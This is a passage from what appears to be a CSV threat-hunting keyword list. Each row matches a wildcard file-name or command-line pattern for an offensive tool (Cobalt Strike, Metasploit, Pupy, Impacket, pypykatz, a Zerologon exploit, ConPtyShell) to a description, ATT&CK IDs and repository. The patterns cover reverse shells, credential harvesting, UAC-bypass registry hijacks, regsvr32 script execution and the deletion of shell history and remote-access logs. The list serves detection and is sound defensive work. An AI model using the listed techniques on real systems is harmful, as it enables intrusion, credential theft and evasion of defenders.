and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*register-python-argcomplete --no-defaults exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*registry_hijacking_eventvwr*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*registry_hijacking_fodhelper*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*RegistryImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*registry-read.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RegistryTinker.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*RegReeper.7z*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.cpp*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.exe*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.sln*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.vcxproj*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*Reg-Restore-Persistence-Mole-main*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*regsvr32.exe /s /n /u /i: * scrobj.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*regsvr32_command_delivery_server*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reinstall_original_pw.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*rekallreader.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*relay*/utils/enum.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RelayPackets.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Release of BloodHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*REM Title: Harvester_OF_SORROW*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*RemAdm*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for remote administration tools ,T1021 - T1027 - T1046 - T1057 - T1068 - T1072 - T1078 - T1135 - T1485 - T1489 - T1497 - T1547,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*remiflavien1/nse-install*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*remiflavien1/recon-archy*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*-remote -destPipe * -pipeHost * -destHost *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Remote/lastpass/lastpass.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Remote/setuserpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Remote/shspawnas*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Remote/suspendresume/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*remote_exploit.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_exploit_cmd_stager.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_exploit_demo_template.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_shell.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*-remote=127.0.0.1:3000*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*remote-exec *jump *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*RemoteHashRetrieval.ps1*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,0,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*remote-method-guesser/rmg*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*remote-method-guesser-master*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*RemoteNTDLL.cpp*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*RemoteNTDLL.exe*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*remotereg.cna*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*RemoteScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*remotewinenum.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Remove_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*removeexe-persistence*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Remove-Item (Get-PSreadlineOption).HistorySavePath*,offensive_tool_keyword,powershell,Delete powershell history,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Remove-Item *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces,T1070,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Remove-Item *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*,offensive_tool_keyword,malware,observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their 